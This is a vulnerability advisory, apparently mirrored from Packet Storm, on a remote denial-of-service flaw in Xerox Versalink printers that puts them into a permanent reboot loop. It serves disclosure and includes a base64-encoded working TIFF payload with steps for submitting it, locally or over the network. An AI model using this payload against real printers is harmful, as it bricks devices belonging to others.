Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Xerox Versalink Denial Of Service

🗓️ 25 Jan 2022 00:00:00Reported by Mahmoud Al-QudsiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 239 Views

Remote denial-of-service vulnerability in Xerox Versalink printers, triggered by a specifically crafted TIFF payload, leading to device panic and continuous reboot loop

Code
`[+] Credits: Mahmoud Al-Qudsi  
[+] Website: https://neosmart.net/  
[+] Source: https://neosmart.net/blog/?p=4865  
[+] Media: https://twitter.com/mqudsi and https://twitter.com/neosmart  
  
[Vendor]  
Xerox Corporation  
  
[Product]  
Xerox Versalink printers, other Xerox printers/copiers.  
  
[Vulnerability Type]  
Remote denial-of-service leading to bricked device.  
  
[Security Issue]  
A specifically crafted TIFF payload may be submitted to the printer's job queue  
(in person or over the network) by unauthenticated/unprivileged users or network  
or internet attackers by means of a JavaScript payload. The device will panic  
upon attempting to read the submitted file and a physical reboot will be  
required. Upon reboot, the device will attempt to resume the last-printed job,  
triggering the panic once more. The process repeats ad-infinitum.  
  
[Exploit/PoC]  
Extract the TIFF contents of the base64-encode archive below and submit directly  
to the job queue on a vulnerable printer to trigger the exploit:  
  
UmFyIRoHAQAzkrXlCgEFBgAFAQGAgAD5BbdHEwMC5QAE5QAA9kPUNIAAAANDTVRYZXJveCByZW1v  
dGUgYnJpY2sgcGF5bG9hZCBieSBNYWhtb3VkIEFsLVF1ZHNpDQpTZWUgaHR0cHM6Ly9uZW9zbWFy  
dC5uZXQvYmxvZy8/cD00ODY1IGZvciBtb3JlIGluZm8uAOsG2ysrAgMLjQEEvAMgCd+uuYADAA94  
ZXJveCBicmljay50aWYKAwIA/Fsg4nPVAcISiiBENSb2YDSTz9+g+ofkEQVoaUFeJvK3kDY8WbGp  
HgjY0bFPe8gzgjwjaJNmzSGzlGGm0ZRkySYEISicQttsKElCEti8EbSsdkcDz6/WmRz/N1o/EIEf  
YPQUn+fPO4RLXjWeRbJT8isQTI5AnW6pF0WsD5DaxM4tgNHp3U7xR1fsHuvMYwMeDGyHIB13VlED  
BQQA  
  
[Network Access]  
Local or remote  
  
The sample payload may also be submitted to exploit a Xerox printer with a known  
ip address or host name over the web by taking advantage of the unprotected HTTP  
POST interface exposed by the device on its network interface.  
  
[Severity]  
Critical  
  
The denial-of-service attack results in a semi-permanent "bricking" of the Xerox  
printer. Recovery may be possible if there are unapplied firmware updates by  
forcing an update over the network, which clears the job queue in the process.  
Otherwise, manually clearing the non-volatile storage memory on the device's  
mainboard is required to break out of the loop.  
  
[Disclosure Timeline]  
- September 26, 2019: Reported to Xerox  
- January 14, 2020: Confirmed by Xerox in response to a request for updates  
- January 25, 2022: Publicly disclosed, remains unpatched and exploitable  
  
Mahmoud  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jan 2022 00:00Current
7.4High risk
Vulners AI Score7.4
xerox versalinkremote denial-of-servicevulnerabilitytiff payloaddevice paniccontinuous rebootfirmware updateunpatchedexploitable
239